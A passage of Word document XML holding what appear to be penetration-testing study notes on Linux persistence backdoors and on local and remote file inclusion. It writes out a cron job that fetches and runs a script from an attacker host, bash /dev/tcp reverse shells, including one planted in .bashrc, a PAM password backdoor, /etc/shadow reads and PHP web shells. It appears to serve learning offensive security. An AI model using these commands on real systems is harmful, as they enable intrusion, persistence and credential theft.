        <w:t>using root, add a scheduled task where a reverse is sent to you every minute</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26C1B789" w14:textId="77777777" w:rsidR="004F2EC1" w:rsidRDefault="004F2EC1" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="4"/>
          <w:numId w:val="21"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">ex. ** *** root curl </w:t>
      </w:r>
      <w:hyperlink w:history="1">
        <w:r w:rsidRPr="004E75C7">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>http://&lt;attacker</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:t xml:space="preserve"> ip&gt;:&lt;port&gt;/shell | bash</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70AAD1D1" w14:textId="77777777" w:rsidR="004F2EC1" w:rsidRDefault="004F2EC1" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="5"/>
          <w:numId w:val="21"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>run every minute every hour of every day</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="644030F7" w14:textId="77777777" w:rsidR="004F2EC1" w:rsidRDefault="004F2EC1" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="5"/>
          <w:numId w:val="21"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>curl downloads a file and pipes to bash</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0DA35F42" w14:textId="77777777" w:rsidR="004F2EC1" w:rsidRDefault="004F2EC1" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="4"/>
          <w:numId w:val="21"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>contents of shell file</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F8A0D30" w14:textId="77777777" w:rsidR="004F2EC1" w:rsidRDefault="004F2EC1" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="5"/>
          <w:numId w:val="21"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>#!/bin/bash</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E28DCB3" w14:textId="77777777" w:rsidR="004F2EC1" w:rsidRDefault="004F2EC1" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="5"/>
          <w:numId w:val="21"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>bash -i &gt;&amp; /dev/tcp/ip/port 0&gt;&amp;1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00A7BF4F" w14:textId="77777777" w:rsidR="004F2EC1" w:rsidRDefault="004F2EC1" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="4"/>
          <w:numId w:val="21"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>run http server to serve shell</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E62EBFA" w14:textId="77777777" w:rsidR="004F2EC1" w:rsidRDefault="004F2EC1" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="5"/>
          <w:numId w:val="21"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>python3 -m http.server &lt;port&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7403AB16" w14:textId="77777777" w:rsidR="004F2EC1" w:rsidRDefault="004F2EC1" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="4"/>
          <w:numId w:val="21"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>listen on specified port</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BC76B6B" w14:textId="77777777" w:rsidR="004F2EC1" w:rsidRDefault="004F2EC1" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="5"/>
          <w:numId w:val="21"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>nc -lvnp &lt;port&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C70CE99" w14:textId="77777777" w:rsidR="004F2EC1" w:rsidRDefault="004F2EC1" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="21"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>not hidden</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4EB29E8B" w14:textId="77777777" w:rsidR="004F2EC1" w:rsidRDefault="004F2EC1" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="21"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>.bashrc Backdoors</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="357927F8" w14:textId="77777777" w:rsidR="004F2EC1" w:rsidRDefault="004F2EC1" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="21"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>if a user has bash as their login shell, .bashrc file in home directory is executed when an interactive session is launched</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03FF1709" w14:textId="77777777" w:rsidR="004F2EC1" w:rsidRDefault="004F2EC1" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="21"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>echo ‘bash -i &gt;&amp; /dev/tcp/ip/port 0&gt;&amp;1’ &gt;&gt; ~/.bashrc</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C2361C0" w14:textId="77777777" w:rsidR="004F2EC1" w:rsidRDefault="004F2EC1" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="4"/>
          <w:numId w:val="21"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>always have nc listener ready</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2469E668" w14:textId="77777777" w:rsidR="004F2EC1" w:rsidRDefault="004F2EC1" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="21"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>pam_unix.so Backdoors</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0DB8EDBD" w14:textId="77777777" w:rsidR="004F2EC1" w:rsidRDefault="004F2EC1" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="21"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>file responsible in linux for authentication</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A8529DB" w14:textId="77777777" w:rsidR="004F2EC1" w:rsidRDefault="004F2EC1" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="21"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>adding code “if (strcmp(p, “0xMitsurugi”) != 0)”</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31A360E5" w14:textId="77777777" w:rsidR="004F2EC1" w:rsidRDefault="004F2EC1" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="4"/>
          <w:numId w:val="21"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>compares two strings, variable p stores password</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63C8FCB8" w14:textId="77777777" w:rsidR="004F2EC1" w:rsidRDefault="004F2EC1" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="4"/>
          <w:numId w:val="21"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>if user supplied password and 0xMitsurugi are not the same, function unix_verify_password is used</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3093FC48" w14:textId="77777777" w:rsidR="004F2EC1" w:rsidRDefault="004F2EC1" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="5"/>
          <w:numId w:val="21"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>if same, PAM_SUCCESS</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38421D0A" w14:textId="77777777" w:rsidR="004F2EC1" w:rsidRDefault="004F2EC1" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="4"/>
          <w:numId w:val="21"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>essentially, backdoor adds own password to pam_unix.so (0xMitsurugi)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B60DC07" w14:textId="77777777" w:rsidR="004F2EC1" w:rsidRDefault="004F2EC1" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="21"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>this code is added to create an if loop that checks for the attacker supplied password before moving to the normal password verification measure</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2DE5D8C1" w14:textId="77777777" w:rsidR="004F2EC1" w:rsidRDefault="007A6E65" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="21"/>
        </w:numPr>
      </w:pPr>
      <w:hyperlink r:id="rId112" w:history="1">
        <w:r w:rsidR="004F2EC1" w:rsidRPr="004E75C7">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>http://0x90909090.blogspot.com/2016/06/creating-backdoor-in-pam-in-5-line-of.html</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="65B92047" w14:textId="77777777" w:rsidR="004F2EC1" w:rsidRDefault="007A6E65" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="21"/>
        </w:numPr>
      </w:pPr>
      <w:hyperlink r:id="rId113" w:history="1">
        <w:r w:rsidR="004F2EC1" w:rsidRPr="004E75C7">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>https://github.com/zephrax/linux-pam-backdoor</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="0A183E87" w14:textId="77777777" w:rsidR="004F2EC1" w:rsidRDefault="004F2EC1" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="21"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Resources</w:t>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
    </w:p>
    <w:p w14:paraId="2872E449" w14:textId="771CC630" w:rsidR="004F2EC1" w:rsidRDefault="007A6E65" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="21"/>
        </w:numPr>
      </w:pPr>
      <w:hyperlink r:id="rId114" w:history="1">
        <w:r w:rsidR="004F2EC1" w:rsidRPr="004E75C7">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>https://airman604.medium.com/9-ways-to-backdoor-a-linux-box-f5f83bae5a3c</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="7C24534D" w14:textId="0C2EF96D" w:rsidR="007E51E4" w:rsidRDefault="007E51E4" w:rsidP="007E51E4">
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="6" w:space="1" w:color="auto"/>
        </w:pBdr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="09F80A24" w14:textId="6F438C59" w:rsidR="007E51E4" w:rsidRDefault="00A13BFB" w:rsidP="007E51E4">
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>LFI – Local File Inclusion Vulnerability</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="408D6880" w14:textId="1F1566E0" w:rsidR="00A13BFB" w:rsidRDefault="00A13BFB" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="22"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>Introduction</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13185481" w14:textId="505892F3" w:rsidR="00A13BFB" w:rsidRDefault="00A13BFB" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="22"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>vulnerability commonly found in web servers</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="710A615F" w14:textId="32C1962B" w:rsidR="009B5AC9" w:rsidRDefault="009B5AC9" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="22"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="009B5AC9">
        <w:t>https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/File%20Inclusion</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="737B73F9" w14:textId="1C054FFB" w:rsidR="00A13BFB" w:rsidRDefault="00A13BFB" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="22"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>exploited when a user input contains a certain path to the file which might be present on the server and included in output</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12DA108D" w14:textId="15C07411" w:rsidR="00A13BFB" w:rsidRDefault="00A13BFB" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="22"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>used to read files containing sensitive and confidential data from vulnerable system</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13315F3C" w14:textId="567DCA75" w:rsidR="00A13BFB" w:rsidRDefault="00A13BFB" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="22"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>caused by improper sanitization of user input</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32CCBE20" w14:textId="0FBB88D7" w:rsidR="00A13BFB" w:rsidRDefault="00A13BFB" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="22"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>common in PHP</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="287D51EF" w14:textId="5DAB304B" w:rsidR="001B646D" w:rsidRDefault="001B646D" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="22"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>Inspect Element</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B6890AE" w14:textId="734D91F0" w:rsidR="001B646D" w:rsidRDefault="001B646D" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="22"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>Search for scripts on page with commands that can be used in Console</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01E49795" w14:textId="33F6DBC5" w:rsidR="001B646D" w:rsidRDefault="001B646D" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="22"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>such as getNote() and attempt to use command to retrieve files that have not been properly whitelisted, such as /etc/shadow</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2059E56B" w14:textId="221275D1" w:rsidR="001B646D" w:rsidRDefault="001B646D" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="22"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>ex. page that has notes posted</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="393E89A0" w14:textId="728AF4F2" w:rsidR="001B646D" w:rsidRDefault="001B646D" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="22"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>getNote(‘/etc/shadow’,’#note-1’) should return shadow file under note-1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57E3C9EB" w14:textId="208144C8" w:rsidR="001B646D" w:rsidRDefault="001B646D" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="22"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">pay attention to the script itself, the variables </w:t>
      </w:r>
      <w:r w:rsidR="007C77F8">
        <w:t>and functions used in the scripts</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31843185" w14:textId="19F3402D" w:rsidR="00A13BFB" w:rsidRDefault="00A13BFB" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="22"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>Getting User Access via LFI</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23F1BA98" w14:textId="463FEBDF" w:rsidR="00A13BFB" w:rsidRDefault="00A13BFB" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="22"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>test for LFI</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D48A7C0" w14:textId="0833C29D" w:rsidR="00BD29C7" w:rsidRDefault="00BD29C7" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="22"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>vulnerable code example</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44BDBF87" w14:textId="373B8EA7" w:rsidR="00BD29C7" w:rsidRDefault="00BD29C7" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="22"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>$local_file = $_REQUEST[“page”];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18655B88" w14:textId="724069C8" w:rsidR="00A13BFB" w:rsidRDefault="00A13BFB" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="22"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>need a parameter on any URL or any other input fields (like request body, etc.)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C270176" w14:textId="6685FBC9" w:rsidR="00A13BFB" w:rsidRDefault="00A13BFB" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="22"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">ex. </w:t>
      </w:r>
      <w:hyperlink w:history="1">
        <w:r w:rsidRPr="004C1D0B">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>https://&lt;website&gt;/?file=robots.txt</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="518A3629" w14:textId="71F58991" w:rsidR="00A13BFB" w:rsidRDefault="00A13BFB" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="22"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>file is parameter name</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73AB7696" w14:textId="5EE538D8" w:rsidR="000876D0" w:rsidRDefault="000876D0" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="4"/>
          <w:numId w:val="22"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>page is another example</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="594297CC" w14:textId="101ED4ED" w:rsidR="00A13BFB" w:rsidRDefault="00A13BFB" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="22"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>robots.txt is value being passed</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09DB4551" w14:textId="5A8EBD8D" w:rsidR="00181031" w:rsidRDefault="00181031" w:rsidP="00181031">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="22"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>RFI</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="310AA75C" w14:textId="676C4851" w:rsidR="00181031" w:rsidRDefault="00181031" w:rsidP="00181031">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="22"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>PHP Expect Wrapper</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="401F43E9" w14:textId="64199770" w:rsidR="00181031" w:rsidRDefault="00181031" w:rsidP="00181031">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="22"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>example.php?page=expect://id;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44D389D1" w14:textId="21E3917E" w:rsidR="00181031" w:rsidRDefault="00181031" w:rsidP="00181031">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="22"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>POST /example.php?page=php://input&amp;cmd=id HTTP/1.1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32516504" w14:textId="4FB8C91A" w:rsidR="00181031" w:rsidRDefault="00181031" w:rsidP="00181031">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="4"/>
          <w:numId w:val="22"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>&lt;?php echo shell_exec($_GET[‘cmd’]);?&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F07BA64" w14:textId="314EC0A4" w:rsidR="003A3036" w:rsidRDefault="003A3036" w:rsidP="003A3036">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="22"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>Example RFI Attack</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35412FF7" w14:textId="38999A26" w:rsidR="003A3036" w:rsidRDefault="007A6E65" w:rsidP="003A3036">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="22"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:hyperlink r:id="rId115" w:history="1">
        <w:r w:rsidR="003A3036" w:rsidRPr="00DB3BFD">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>http://example.com/example.php?file=http://www.malicious-example.com/malicious.php</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="2379F5E8" w14:textId="72A66A6F" w:rsidR="003A3036" w:rsidRDefault="003A3036" w:rsidP="003A3036">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="22"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>File Uploads</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="754E1D8E" w14:textId="2AB8F171" w:rsidR="003A3036" w:rsidRDefault="003A3036" w:rsidP="003A3036">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="22"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>&lt;?php if(isset($_REQUEST[‘cmd])){ echo “&lt;pre&gt;”;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14133706" w14:textId="5F369E68" w:rsidR="003A3036" w:rsidRDefault="003A3036" w:rsidP="003A3036">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:ind w:left="3600"/>
      </w:pPr>
      <w:r>
        <w:t>$cmd = ($_REQUEST[‘cmd’]);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45EAE510" w14:textId="1CCBB551" w:rsidR="003A3036" w:rsidRDefault="003A3036" w:rsidP="003A3036">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:ind w:left="3600"/>
      </w:pPr>
      <w:r>
        <w:t>system($cmd); echo “&lt;/pre&gt;”; die; }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4DF7A47D" w14:textId="0EEED9E1" w:rsidR="003A3036" w:rsidRDefault="003A3036" w:rsidP="003A3036">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:ind w:left="3600"/>
      </w:pPr>
      <w:r>
        <w:t>?&gt;</w:t>
      </w:r>
    </w:p>
